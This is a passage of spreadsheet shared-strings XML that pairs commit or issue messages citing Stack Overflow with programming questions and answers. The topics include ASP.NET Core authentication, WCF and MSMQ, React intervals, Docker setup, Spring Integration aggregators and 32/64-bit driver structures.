  </si>
  <si>
    <t>C748</t>
  </si>
  <si>
    <t>zw - reusing appIcon from main app for use as the share extension appIcon
Followed instructions at http://stackoverflow.com/questions/24097581/why-isnt-my-ios8-application-action-extension-app-icon-showing-up</t>
  </si>
  <si>
    <t>Your asset catalog in your main application isn't accessible from your application extension as they are two separate applications bundles that can only share Frameworks.
You will need to create a separate asset catalog in your action extensions folder and reference that one in your Targets.</t>
  </si>
  <si>
    <t xml:space="preserve">I'm currently doing analysis and design for a new message bus architecture in my company.  I have tried MSMQ to do something like this in the past and it works well and was thinking of doing the same thing again for this project but using WCF as the API instead of using the System.Messaging API.  Has anyone had experience with MSMQ in WCF?  Is it easier to use then the System.Messaging API?  What would be some benefits of using WCF over System.Messaging or vice versa?
</t>
  </si>
  <si>
    <t>C749</t>
  </si>
  <si>
    <t>fix org/org quota/space aggregation
https://stackoverflow.com/questions/45081372/suitable-design-pattern-for-report-system
https://stackoverflow.com/questions/1633196/design-pattern-for-class-with-upwards-of-100-properties]
https://stackoverflow.com/questions/57788014/microservices-aggregate-data-is-there-some-good-patterns
https://stackoverflow.com/questions/37635769/elegant-way-to-implement-template-method-pattern-in-golang
https://softwareengineering.stackexchange.com/questions/225153/best-practice-or-design-patterns-for-retrieval-of-data-for-reporting-and-dashboa</t>
  </si>
  <si>
    <t>Since my strong opinion is that your question is primarily about OOP i'll make an example in C# (because i'm most proficient in).
The idea is to use a combination of the Builder and Visitor pattern to process reports .
First, i've defined the Report class like the following (very primitive):
public interface IReport
{
    void Print();
}
public class Report : IReport
{
    private readonly IList&lt;string&gt; lines;
    public Report()
    {
        lines = new List&lt;string&gt;();
    }
    public void AddLine(string line)
    {
        lines.Add(line);
    }
    public void Print()
    {
        foreach (var l in lines) Console.Out.WriteLine(l);
    }
}
Then i've defined the interface for the builder:
public interface IReportBuilder
{
    void Execute();
    IReport Product { get; }
}
and visitor that suits our needs:
public interface IWordVisitor
{
    void VisitWord(string word);
}
The implementation of the page word statistics would look like:
public class PageStatisticVisitor : IWordVisitor
{
    private readonly IDictionary&lt;string, long&gt; stats;
    public PageStatisticVisitor()
    {
        stats = new Dictionary&lt;string, long&gt;();
    }
    public IDictionary&lt;string, long&gt; Stats { get { return stats; } }
    public void VisitWord(string word)
    {
        long currentStat;
        if (stats.TryGetValue(word, out currentStat)) currentStat++;
        else currentStat = 1;
        stats[word] = currentStat;
    }
}
(just counts the same words in the text).
I incapsulate the page content into the Page class that does now the visitor:
 public class Page
{
    private string pageContent;
    public Page(string content)
    {
        pageContent = content;
    }
    public void Accept(IWordVisitor visitor)
    {
        foreach (var w in pageContent.Split())
        {
            visitor.VisitWord(w);
        }
    }
}
The word statistics report builder:
public class WordStatisticsBuilder : IReportBuilder
{
    private Report report;
    private Page page;
    public WordStatisticsBuilder(Page page)
    {
        report = new Report();
        this.page = page;
    }
    public void Execute()
    {
        var psv = new PageStatisticVisitor();
        page.Accept(psv);            
        foreach (var s in psv.Stats)
        {
            report.AddLine(string.Format("{0} : {1}", s.Key, s.Value));
        }
    }
    public IReport Product
    {
        get { return report; }
    }
}
The usage:
var page = new Page(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var statistics = new WordStatisticsBuilder(page);
        statistics.Execute();
        statistics.Product.Print();
I hope you've got an idea and could implement it in JAva.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In the strict mode of react it is running this function &amp;quot;fetchLiveChatMsg(liveChatId);&amp;quot; twice in setInterval, but when the unmounting happen it still keeps running this function even the interval is clear but in the non-strict mode of react everything is working fine&lt;/p&gt;
&lt;p&gt;NOTE: I've already tried the useRef in intervalId, pageToken, it is still working the same&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import { useEffect, useRef } from &amp;quot;react&amp;quot;;
import LiveChatMsg from &amp;quot;./LiveChatMsg&amp;quot;;
import { useDispatch, useSelector } from &amp;quot;react-redux&amp;quot;;
import { addLiveMsg } from &amp;quot;../utils/LiveChatSlice&amp;quot;;
const LiveChat = ({videoId}) =&amp;gt; {
    const dispatch = useDispatch();
    let intervalId;
    let pageToken;
    const liveMessages = useSelector((store) =&amp;gt; store.liveChat.messages);
    const fetchLiveChatMsg = async (liveChatId) =&amp;gt; {
        const response = await fetch(`https://www.googleapis.com/youtube/v3/liveChat/messages?pageToken=${pageToken ? pageToken : &amp;quot;&amp;quot;}&amp;amp;liveChatId=${liveChatId}&amp;amp;part=snippet,authorDetails&amp;amp;key=${import.meta.env.VITE_GOOGLE_API_KEY}&amp;amp;maxResults=1`);
        const data = (await response.json());
        pageToken = data.nextPageToken;
        console.log(pageToken);
        console.log(data);
        dispatch(addLiveMsg(data?.items[0]));
    }
    const fetchLiveId = async () =&amp;gt; {
        const response = await fetch(`https://www.googleapis.com/youtube/v3/videos?part=liveStreamingDetails&amp;amp;id=${videoId}&amp;amp;key=${import.meta.env.VITE_GOOGLE_API_KEY}`);
        const liveChatId = (await response.json())?.items[0]?.liveStreamingDetails?.activeLiveChatId;
        if(liveChatId) {
            console.log(liveChatId);
            intervalId = setInterval(() =&amp;gt; {
                fetchLiveChatMsg(liveChatId);
            }, 3000);
        }
    }
    useEffect(() =&amp;gt; {
        fetchLiveId();
        return () =&amp;gt; {
            console.log(intervalId);
            clearInterval(intervalId);
        }
    }, []);
    return (
        liveMessages &amp;amp;&amp;amp; &amp;lt;div className=&amp;quot;w-2/5 flex border-[1.5px] rounded-xl p-[8px] h-[450px] flex-col-reverse gap-[10px] overflow-y-scroll bg-gray-50&amp;quot;&amp;gt;
            {
                liveMessages.map((el, idx) =&amp;gt; &amp;lt;LiveChatMsg key={idx} profile={el?.authorDetails?.profileImageUrl} author={el?.authorDetails?.displayName} msg={el?.snippet?.displayMessage} /&amp;gt;)
            }
        &amp;lt;/div&amp;gt;
    );
};
export default LiveChat;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I want while unmounting the &amp;quot;fetchLiveChatMsg(liveChatId);&amp;quot; function doesn't run because the timer id of the setinterval is cleared&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C75</t>
  </si>
  <si>
    <t>Factor HeroService
We create a Service and use it with dependency injection. For that, we
decorate it with `@Injectable`, which requires an additional feature from
TypeScript.
http://stackoverflow.com/a/42015303/618906</t>
  </si>
  <si>
    <t>Make sure you have
"emitDecoratorMetadata": true,
in your
tsconfig.js
. You should not need to add
@Inject()
to your function parameters if that's enabled.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to setup infinite scroll for Datatable but have an issue. My fetches triggers without scroll event, one by one.
My component is wrapped by .&lt;/p&gt;
&lt;p&gt;On this example I add only one Column for better perfomanse.
Does anybody can see the problem here? I think I have tryed everything, but no result.&lt;/p&gt;
&lt;p&gt;All possible data API fetches fires without scrolling, just on page load.
&lt;a href="https://i.sstatic.net/fzvLtao6.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/fzvLtao6.png" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;The documentation&lt;/p&gt;
&lt;p&gt;&lt;div class="snippet" data-lang="js" data-hide="false" data-console="true" data-babel="false" data-babel-preset-react="false" data-babel-preset-ts="false"&gt;_x000D_
&lt;div class="snippet-code"&gt;_x000D_
&lt;pre class="snippet-code-js lang-js prettyprint-override"&gt;&lt;code&gt;const isLoading = ref(true)
const hasMoreData = ref(true)
const showError = ref(false)
const companiesStore = useCompaniesStore()
const showCompany = ref(false)
const showEditModal = ref(false)
const company = ref({})
const offset = ref(0)
const itemsToShow = 7
const isFetching = ref(false)
await companiesStore.getCompaniesTotal("bwf")
const totalRecords = computed(() =&amp;gt; companiesStore.BWFTotal)
const companies = ref([])
const fetchInitialCompanies = async () =&amp;gt; {
  console.log("initial")
  try {
    const fetchedCompanies = await companiesStore.fetchCompanies({
      type: "bwf",
      limit: 0,
      offset: itemsToShow,
      name: ""
    })
    companies.value = fetchedCompanies
    offset.value += itemsToShow
  } catch (error) {
    console.error("Error fetching initial companies:", error)
  } finally {
    isLoading.value = false
  }
}
fetchInitialCompanies()
const { height } = useWindowSize()
const heightStore = useHeightStore()
const totalHeightGetter = ref(0)
let scrollHeight = ref(null)
let navBottomHeight
watchEffect(() =&amp;gt; {
  if (companies.value) {
    navBottomHeight = document.querySelector(".nav").clientHeight
    heightStore.getNavBottomHeight(navBottomHeight) // getter
    totalHeightGetter.value = heightStore.getTotalHeight // getter
    scrollHeight = height.value - totalHeightGetter.value - 18
    scrollHeight = scrollHeight + "px"
  }
})
const loadMoreCompanies = async () =&amp;gt; {
  console.log("load more")
  if (isFetching.value || !hasMoreData.value) return
  isFetching.value = true
  try {
    const newCompanies = await companiesStore.fetchCompanies({
      type: "bwf",
      limit: itemsToShow,
      offset: offset.value,
      name: ""
    })
    if (newCompanies.length &amp;gt; 0) {
      companies.value = [...companies.value, ...newCompanies]
      offset.value += itemsToShow
      isFetching.value = false
    } else {
      hasMoreData.value = false // No more data to load
    }
  } catch (error) {
    console.error("Error loading more companies:", error)
  } finally {
    isFetching.value = false
  }
}&lt;/code&gt;&lt;/pre&gt;_x000D_
&lt;pre class="snippet-code-html lang-html prettyprint-override"&gt;&lt;code&gt;&amp;lt;script src="https://cdnjs.cloudflare.com/ajax/libs/vue/3.4.2/vue.global.min.js"&amp;gt;&amp;lt;/script&amp;gt;
&amp;lt;div class="table-wrap overflow-auto"&amp;gt;
    &amp;lt;div class="table h-full"&amp;gt;
      &amp;lt;DataTable
        v-if="!isLoading"
        :value="companies"
        dataKey="id"
        :scrollHeight="scrollHeight"
        scrollable
        removableSort
        tableStyle="max-width: 100%; height: 100%"
        ref="listEl"
        lazy
        :virtualScrollerOptions="{
          delay: 5000,
          lazy: true,
          onLazyLoad: loadMoreCompanies,
          itemSize: 65
        }"
        :totalRecords="totalRecords"
      &amp;gt;
&amp;lt;Column field="name" header="Company" sortable style="width: 100%"&amp;gt;
          &amp;lt;template #sorticon&amp;gt; &amp;lt;i class="icon-expand-up-down-line" /&amp;gt; &amp;lt;/template&amp;gt;
          &amp;lt;template #body="slotProps"&amp;gt;
            &amp;lt;span&amp;gt;{{ slotProps.data.name }}&amp;lt;/span&amp;gt;
          &amp;lt;/template&amp;gt;
          &amp;lt;template #loading&amp;gt;
            &amp;lt;Skeleton width="75%" /&amp;gt;
          &amp;lt;/template&amp;gt;
        &amp;lt;/Column&amp;gt;
    &amp;lt;/DataTable&amp;gt;&lt;/code&gt;&lt;/pre&gt;_x000D_
&lt;/div&gt;_x000D_
&lt;/div&gt;_x000D_
&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C750</t>
  </si>
  <si>
    <t>Aggregate one message to mutilple groups [INT-3206] #7183
enable aggregator to aggregate one message to multiple groups, one use case is in stackoverflow http://stackoverflow.com/questions/19980413/how-to-aggrate-one-message-into-multiple-groups-by-spring-integration-aggregator
another use case is to group messages by header, and one message may be able to category into more than one group, which means the correlation strategy could return a list of keys, and the aggregator will append the message to each group, additionally there could be an copy strategy which could indicate if each group will get a dedicated message copy or just the same reference.
Affects: 3.0 M3
Reference URL: http://stackoverflow.com/questions/19980413/how-to-aggrate-one-message-into-multiple-groups-by-spring-integration-aggregator</t>
  </si>
  <si>
    <t>We don't have anything out of the box, but I was able to do what you want with a small modification to the SimpleMessageStore. I have posted the full RollingMessageStore in a gist.
The bottom line is to modify removeGroup to only remove the first message, and not the whole group. Also, make completeGroup a no-op.
Set expreGroupOnCompletion to force the aggregator to "remove" the group (by calling the modified removeGroup() method.
Here is a diff between SimpleMessageGroup and RollingMessageGroup...
182,184c190,194
&lt; 
&lt; 				groupUpperBound.release(groupIdToMessageGroup.get(groupId).size());
&lt; 				groupIdToMessageGroup.remove(groupId);
---
&gt; 				Message&lt;?&gt; message = this.groupIdToMessageGroup.get(groupId).getOne();
&gt; 				if (message != null) {
&gt; 					this.groupUpperBound.release(1);
&gt; 					this.removeMessageFromGroup(groupId, message);
&gt; 				}
(plus remove all the code in completeGroup().
and a test case...
@Test
public void testRolling() {
	AggregatingMessageHandler aggregator = new AggregatingMessageHandler(new MultiplyingProcessor(), new RollingMessageStore());
	aggregator.setExpireGroupsUponCompletion(true);
	aggregator.setReleaseStrategy(new ReleaseStrategy() {
		@Override
		public boolean canRelease(MessageGroup group) {
			return group.size() == 3;
		}
	});
	QueueChannel replyChannel = new QueueChannel();
	Message&lt;?&gt; message1 = createMessage(3, "ABC", 3, 1, replyChannel, null);
	Message&lt;?&gt; message2 = createMessage(5, "ABC", 3, 2, replyChannel, null);
	Message&lt;?&gt; message3 = createMessage(7, "ABC", 3, 3, replyChannel, null);
	Message&lt;?&gt; message4 = createMessage(9, "ABC", 3, 3, replyChannel, null);
	Message&lt;?&gt; message5 = createMessage(11, "ABC", 3, 3, replyChannel, null);
	aggregator.handleMessage(message1);
	aggregator.handleMessage(message2);
	aggregator.handleMessage(message3);
	aggregator.handleMessage(message4);
	aggregator.handleMessage(message5);
	Message&lt;?&gt; reply = replyChannel.receive(10000);
	assertNotNull(reply);
	assertEquals(reply.getPayload(), 105);
	reply = replyChannel.receive(10000);
	assertNotNull(reply);
	assertEquals(reply.getPayload(), 315);
	reply = replyChannel.receive(10000);
	assertNotNull(reply);
	assertEquals(reply.getPayload(), 693);
}
Please go ahead and open a JIRA New Feature Issue and we'll look at adding this (or a more general solution) to the upcoming 3.0 release.
Use correlation-strategy-expression="'foo'" and
release-strategy-expression=size()==3.</t>
  </si>
  <si>
    <t xml:space="preserve">In my line of work it's hard to go five minutes without someone extolling the virtues of MQ Series or MSMQ or the like, and I always wonder, after the sparkle of buzzwords has passed, what are some actual examples of these wonderful devices out in the real world.
What I'm looking for is something that might inspire me to find a use for one of these or give me some kind of metric I can use to evaluate a message bus/message broker/message queue -- hell, even something that will explain what the differences are between the aforementioned message* things.
</t>
  </si>
  <si>
    <t>C751</t>
  </si>
  <si>
    <t>added authentication into asp.net core app; inspiration taken from https://stackoverflow.com/a/49047358/379279 ; discovered that I could re-use templated authentication code from asp.net 3 and modify it from scaffolded identity UI code from asp.net core 2.1</t>
  </si>
  <si>
    <t>Creating custom authentication in ASP.NET Core can be done in a variety of ways. If you want to build off existing components (but don't want to use identity), checkout the "Security" category of docs on docs.asp.net.
https://docs.asp.net/en/latest/security/index.html
Some articles you might find helpful:
Using Cookie Middleware without ASP.NET Identity
Custom Policy-Based Authorization
And of course, if that fails or docs aren't clear enough, the source code is at
https://github.com/dotnet/aspnetcore/tree/master/src/Security
which includes some samples.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Anyone else having this problem in 2.4.13 &lt;strong&gt;JS&lt;/strong&gt; version? loadBundle wouldnâ€™t auto search for version without passing in version&lt;/p&gt;
&lt;p&gt;if I remove the , { version: 'b06d9' } it won't load&lt;/p&gt;
&lt;p&gt;Can anyone help me verify that it's not working at your side too? So I can prove to them that's it's not happening to me only.
You can download the following project to check, or just open a new project  paste the following code in a script file in the scene&lt;/p&gt;
&lt;p&gt;&lt;a href="https://drive.google.com/file/d/1Rp0urUckjV9nazllzgE_AnndmUheig_o/view?usp=sharing" rel="nofollow noreferrer"&gt;https://drive.google.com/file/d/1Rp0urUckjV9nazllzgE_AnndmUheig_o/view?usp=sharing&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;cc.assetManager.loadBundle('https://saltemishel.bitbucket.io/testbundle/assets/testbundle', { version: 'b06d9' }, (err, bundle) =&amp;gt; {
            if (err) {
                console.error(&amp;quot;Failed to load bundle:&amp;quot;, err);
                return;
            }
            console.log(bundle)
            bundle.load(`caca`, cc.Prefab, function (err, prefab) {
                let newNode = cc.instantiate(prefab);
                newNode.x=100
                newNode.y=100;
                cc.director.getScene().addChild(newNode);
            });
        });
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C752</t>
  </si>
  <si>
    <t>migrating suggestions for use of wwwroot/auth to wwwroot/.auth for alignment easyauth enabled cloud deployment and details discussed in asp.net core publish of wwwroot subfolders starting with '.'  [ == https://stackoverflow.com/questions/53965502/asp-net-core-publish-on-root-of-wwwroot-folder-starting-with?noredirect=1#comment94768960_53965502 ]</t>
  </si>
  <si>
    <t>I had this problem too, I need to publish some static files in
wwwroot/.well-known
folder for LetsEncrypt validation
Just "include" the folder in the project, then press F4 on its files and in the "properties" set "copy to output folder"
Alternatively just copy-paste this into your .csproj
&lt;ItemGroup&gt;
  &lt;Content Include="wwwroot\.well-known\*"&gt;
      &lt;CopyToOutputDirectory&gt;PreserveNewest&lt;/CopyToOutputDirectory&gt;
  &lt;/Content&gt;
&lt;/ItemGroup&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">I have a Windows application that HAS to run as 32-bits (because of other limitations out of my control). However, my application has to call and access a driver which may be 32-bits or 64-bits depending on the system where it is installed.
I access the driver through DeviceIoControl() calls, exchanging data structures declared in an include file. Data structures contains fields declared as "DWORD_PTR" (the include file I don't control either).
My problem is that on a 64-bits system, the driver expects the structures to contain 64-bits integer (because of DWORD_PTR declaration). However, my 32-bits program sees those DWORD_PTR as 32-bits integers. I then have a data mismatch between my program version of the data structures and the driver understanding of those structures.
DeviceIoControl() ends-up failing with ERROR_INSUFFICIENT_BUFFER (The data area passed to a system call is too small). I confirmed that I don't get this error if I pass a 64-bits version of the structs to the driver.
I have a few ugly options out of this mess. But I wonder if anyone has some nicer suggestions?
Solution:
Declare a new copy of the shared structures with REAL 64-bits data fields (__int64)
Dynamically check the OS architecture (32/64)
Use the 32-bits or 64-bits version of the structures for the DeviceIoControl() calls.
Drawbacks:
I have to maintain an explicit 64-bits copy of the structures declaration manually. It can be a pain over time.
My other solutions are variation of this one, but they ALWAYS involve maintaining some copy of the structures definition (for example in an IDL for COM servers option).
Edit: This is a Microsoft driver and it seems it does not use IoIs32bitsProcess(irp)!
</t>
  </si>
  <si>
    <t>C753</t>
  </si>
  <si>
    <t>Overview page for SPAs #26373. Can we provide an overview page for SPAs so that we can add common information about SPA development with ASP.NET Core? As well as docs on how the templates work during development and production? (I will be providing the content).
Could we also remove the JavaScript Services section from the docs, since that is not something we longer recommend? Thank you! This is great information and helped me to debug my upgraded Angular SPA application locally.
Please mention this code for Program.cs from https://stackoverflow.com/questions/78086272/deployment-on-iis-local-of-asp-net-core-8-and-angular-v17-2-1-application-ma to that is essential to resolve deployment issues to Azure Web Apps or IIS:</t>
  </si>
  <si>
    <t>Use this, the IIS is looking in the wrong place for index.html like browsermator said
var builder = WebApplication.CreateBuilder(new WebApplicationOptions
{
    Args = args,
    WebRootPath = Path.Combine(Directory.GetCurrentDirectory(), "wwwroot", "browser")
});</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a react app made with create-react-app with a PHP backend that I was wanting to containerize and thought would be a good first project to get more familiar with Docker. Initially, I had the docker container running on Windows, but when editing the source could, builds were painfully slow. After some research, it was suggested to move the repo directly into Windows Subsystem for Linux (WSL) to speed up file transfers.&lt;/p&gt;
&lt;p&gt;After copying the files to WSL and calling &lt;code&gt;docker compose up --build&lt;/code&gt;, I started getting a &lt;code&gt;react-scripts: Permission denied&lt;/code&gt; error. Assuming this was an issue from copying the files over, I deleted the &lt;code&gt;node_modules&lt;/code&gt; folder and tried &lt;code&gt;docker compose up --build&lt;/code&gt; again. Now, I'm getting &lt;code&gt;react-scripts: not found&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;After checking, the &lt;code&gt;node_modules&lt;/code&gt; in the container is populated and the &lt;code&gt;react-scripts&lt;/code&gt; is present, but &lt;code&gt;./app/node_modules&lt;/code&gt; is empty.&lt;/p&gt;
&lt;p&gt;Since, I have the &lt;code&gt;node_modules&lt;/code&gt; folder setup as a volume, shouldn't they be synced? I've tried everything I can find to get it to work, including &lt;code&gt;docker system prune -a --volumes&lt;/code&gt; and rebuilding everything from scratch and the &lt;code&gt;./app/node_modules&lt;/code&gt; is still empty.&lt;/p&gt;
&lt;p&gt;How can I get the &lt;code&gt;react-scripts&lt;/code&gt; command to run without the permissions issue? Shouldn't just work the same as it did in Windows?&lt;/p&gt;
&lt;p&gt;Note: &lt;code&gt;npm start&lt;/code&gt; is just an alias for &lt;code&gt;react-scripts start&lt;/code&gt;.&lt;/p&gt;
&lt;pre class="lang-yaml prettyprint-override"&gt;&lt;code&gt;# ./docker-compose.yaml
version: &amp;quot;3.8&amp;quot;
services:
  app:
    build:
      context: ./app
      dockerfile: Dockerfile
    ports: 
      - 3000:3000
    volumes:
      - ./app:/app
      - ./app/node_modules:/app/node_modules
    environment:
      - WATCHPACK_POLLING=true
      - BROWSER=none
&lt;/code&gt;&lt;/pre&gt;
&lt;pre class="lang-none prettyprint-override"&gt;&lt;code&gt;# ./app/Dockerfile
FROM node:18 AS build
WORKDIR /app
COPY package.json package-lock.json ./
RUN npm install
COPY . .
EXPOSE 3000
CMD [ &amp;quot;npm&amp;quot;, &amp;quot;start&amp;quot; ]
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code&gt;# ./app/.dockerignore
node_modules
npm-debug.log
Dockerfile
.dockerignore
.git
.gitignore
.vscode
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code&gt;[+] Building 58.7s (11/11) FINISHED                                                                                                                                                                                   docker:default
 =&amp;gt; [app internal] load build definition from Dockerfile                                                                                                                                                                        0.1s
 =&amp;gt; =&amp;gt; transferring dockerfile: 336B                                                                                                                                                                                            0.0s
 =&amp;gt; [app internal] load metadata for docker.io/library/node:18                                                                                                                                                                  1.1s
 =&amp;gt; [app internal] load .dockerignore                                                                                                                                                                                           0.0s
 =&amp;gt; =&amp;gt; transferring context: 121B                                                                                                                                                                                               0.0s
 =&amp;gt; [app 1/5] FROM docker.io/library/node:18@sha256:f12d34408955b2081f82078e8f96c3299ca0f38d11e76086cb9b9b1b669977e4                                                                                                           24.4s
 =&amp;gt; =&amp;gt; resolve docker.io/library/node:18@sha256:f12d34408955b2081f82078e8f96c3299ca0f38d11e76086cb9b9b1b669977e4                                                                                                                0.0s
 =&amp;gt; =&amp;gt; sha256:a492eee5e55976c7d3feecce4c564aaf6f14fb07fdc5019d06f4154eddc93fde 48.48MB / 48.48MB                                                                                                                                3.8s
 =&amp;gt; =&amp;gt; sha256:35af2a7690f2b43e7237d1fae8e3f2350dfb25f3249e9cf65121866f9c56c772 64.39MB / 64.39MB                                                                                                                                9.5s
 =&amp;gt; =&amp;gt; sha256:f12d34408955b2081f82078e8f96c3299ca0f38d11e76086cb9b9b1b669977e4 6.41kB / 6.41kB                                                                                                                                  0.0s
 =&amp;gt; =&amp;gt; sha256:d4cd021b33732523d311a6c9eac765b0229e31962adedc7990333ff865a5b25d 2.49kB / 2.49kB                                                                                                                                  0.0s
 =&amp;gt; =&amp;gt; sha256:9cc56e2c51419614a5027c82bc07fad1f9bc07db014dd7ec184e1ff8c1f4393b 6.39kB / 6.39kB                                                                                                                                  0.0s
 =&amp;gt; =&amp;gt; sha256:32b550be6cb62359a0f3a96bc0dc289f8b45d097eaad275887f163c6780b4108 24.06MB / 24.06MB                                                                                                                                3.9s
 =&amp;gt; =&amp;gt; extracting sha256:a492eee5e55976c7d3feecce4c564aaf6f14fb07fdc5019d06f4154eddc93fde                                                                                                                                       3.3s
 =&amp;gt; =&amp;gt; sha256:7576b00d9bb10cc967bb5bdeeb3d5fa078ac8800e112aa03ed15ec199662d4f7 211.33MB / 211.33MB                                                                                                                             16.6s
 =&amp;gt; =&amp;gt; sha256:d55bd4ee018bb8787aaa9ea963210d6762a3c3243daca340f099c12dc76dc8a0 3.32kB / 3.32kB                                                                                                                                  4.1s
 =&amp;gt; =&amp;gt; sha256:699c77750bbfa3355160caafaffc0809bf2fc503cb6b3432975faba7101eaf8f 45.72MB / 45.72MB                                                                                                                                8.8s
 =&amp;gt; =&amp;gt; extracting sha256:32b550be6cb62359a0f3a96bc0dc289f8b45d097eaad275887f163c6780b4108                                                                                                                                       1.1s
 =&amp;gt; =&amp;gt; sha256:a90d998fbd35e749dd38959f8e6632895f944df7662d041c5cd44c7e61697bbe 1.25MB / 1.25MB                                                                                                                                  9.1s
 =&amp;gt; =&amp;gt; sha256:0d7872d72f6bb464d751d0a19af2d095b0dde109eb23fbabae9470ea987a912e 447B / 447B                                                                                                                                      9.5s
 =&amp;gt; =&amp;gt; extracting sha256:35af2a7690f2b43e7237d1fae8e3f2350dfb25f3249e9cf65121866f9c56c772                                                                                                                                       3.1s
 =&amp;gt; =&amp;gt; extracting sha256:7576b00d9bb10cc967bb5bdeeb3d5fa078ac8800e112aa03ed15ec199662d4f7                                                                                                                                       5.4s
 =&amp;gt; =&amp;gt; extracting sha256:d55bd4ee018bb8787aaa9ea963210d6762a3c3243daca340f099c12dc76dc8a0                                                                                                                                       0.0s
 =&amp;gt; =&amp;gt; extracting sha256:699c77750bbfa3355160caafaffc0809bf2fc503cb6b3432975faba7101eaf8f                                                                                                                                       1.9s
 =&amp;gt; =&amp;gt; extracting sha256:a90d998fbd35e749dd38959f8e6632895f944df7662d041c5cd44c7e61697bbe                                                                                                                                       0.0s
 =&amp;gt; =&amp;gt; extracting sha256:0d7872d72f6bb464d751d0a19af2d095b0dde109eb23fbabae9470ea987a912e                                                                                                                                       0.0s
 =&amp;gt; [app internal] load build context                                                                                                                                                                                           0.1s
 =&amp;gt; =&amp;gt; transferring context: 6.21MB                                                                                                                                                                                             0.1s
 =&amp;gt; [app 2/5] WORKDIR /app                                                                                                                                                                                                      3.2s
 =&amp;gt; [app 3/5] COPY package.json package-lock.json ./                                                                                                                                                                            0.0s
 =&amp;gt; [app 4/5] RUN npm install                                                                                                                                                                                                  26.0s
 =&amp;gt; [app 5/5] COPY . .                                                                                                                                                                                                          0.1s
 =&amp;gt; [app] exporting to image                                                                                                                                                                                                    3.6s
 =&amp;gt; =&amp;gt; exporting layers                                                                                                                                                                                                         3.6s
 =&amp;gt; =&amp;gt; writing image sha256:f2dd256518778bd48fc348c1e239ebfcccd2305baeeb9798fe026ebe374fd1ff                                                                                                                                    0.0s
 =&amp;gt; =&amp;gt; naming to docker.io/library/ship-explorer-app                                                                                                                                                                            0.0s
 =&amp;gt; [app] resolving provenance for metadata file                                                                                                                                                                                0.0s
[+] Running 3/3
 âœ” app                                Built                                                                                                                                                                                     0.0s 
 âœ” Network ship-explorer_app-network  Created                                                                                                                                                                                   0.2s 
 âœ” Container ship-explorer-app-1      Created                                                                                                                                                                                   0.1s 
Attaching to app-1
app-1  | 
app-1  | &amp;gt; ship-explorer@0.1.0 start
app-1  | &amp;gt; react-scripts start
app-1  | 
app-1  | sh: 1: react-scripts: not found
app-1 exited with code 127
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C754</t>
  </si>
  <si>
    <t>Authenticated but unauthorised users are being redirected to login page instead of 403 page. #6681
The behaviour of AbpAuthorizationFilter for users who have logged in but doesn't have the required permission(s) is to redirect them to the login page. My unauthorised users were so confused as to why they have to re-login over and over again thinking it's a bug with the system</t>
  </si>
  <si>
    <t>Out of the three options, I went with option number two ( override the
OnRedirectToLogin
event) for the following reasons:
Minimal code introduced without duplicating an entire authorization filter to only change two lines of code.
More control of the challenge experience ( the MVC app is an OIDC client too ) with its own set of roles and permissions ( see code solution below )
At the time of this response, the
OnRedirectToLogin
event is only raised by the
HandleChallengeAsync
in the
CookieAuthenticationHandler
so this feels like the correct place to override the
ChallengeResult
behavior.
Solution:
options.Events.OnRedirectToLogin = context =&gt;
{
    if (context.HttpContext?.User?.Identity?.IsAuthenticated == false)
    {
        //The user is not authenticated... Use the "oidc" challenge scheme 
        //and send them to identity server.
        var task = context.HttpContext.ChallengeAsync("oidc");
        task.WaitAndUnwrapException();
        return Task.CompletedTask;
    }
    var accessDeniedPath = BuildRedirectUri(context.HttpContext, options.AccessDeniedPath);
    context.Response.Redirect(accessDeniedPath);
    context.Response.StatusCode = 302;
    return Task.CompletedTask;
};
Side Note:
It should be noted that the default behavior of the
AbpAuthorizationFilter
does not mirror the stock behavior of Asp.Net Core MVC 2.0
AuthorizeFilter
. When authorization fails for an authenticated user, the Asp.Net Core MVC 2.0
AuthorizeFilter
returns a Forbid result.
Asp.Net Core MVC's default
AuthorizeFilter
delegates the authorization to the
IPolicyEvaluator
. If the authorization fails and the user is authenticated, a Forbid result is set or if the authorization fails and the user is not-authenticated, a Challenge result is set.
PolicyEvaluator.cs
var result = await _authorization.AuthorizeAsync(context.User, resource, policy);
if (result.Succeeded) 
{ 
    return PolicyAuthorizationResult.Success(); 
} 
// If authentication was successful, return forbidden, otherwise challenge 
return (authenticationResult.Succeeded)  
    ? PolicyAuthorizationResult.Forbid()  
    : PolicyAuthorizationResult.Challenge();</t>
  </si>
  <si>
    <t xml:space="preserve">we currently have an asmx webservice which exposes a single method to make various updates to a Sql database, wrapped internally in a SqlTransaction.
I am re-writing this service in WCF and we would like to split up the existing method into sub-calls accessed through various different WCF services.  There is a restriction to use basicHttpBinding on the services, which rules out all the built-in WCF transaction features.  Is it possible to go with this architecture and maintain a transaction across multiple service calls?  WS-TRANS has been suggested as a possible solution but I'm not familiar with it, would this work?
</t>
  </si>
  <si>
    <t>C755</t>
  </si>
  <si>
    <t>Dynamic support of external identity providers (Azure AD) #1791
onfirm you've already contributed to this project or that you sponsor it
 I confirm I'm a sponsor or a contributor
Version
4.x
Question
Hi,
I have a multitenant SaaS application, exposing an ASP.NET API. The application SPA, registered as a public client in openiddict, uses an authorization code flow to get user tokens, and then access the API endpoints by provided this token as a bearer token in the Authorization header. The API enpoints are protected by openiddict and users are authenticated internally using their password. Authenticated users have a session managed by a cookie on the /connect/authorize endpoint which avoid entering their password if the cookie is still valid.
I have also other kind of applications accessing the API with their own (confidential) openiddict application, with or without users (authorization code, client credentials or device flow).
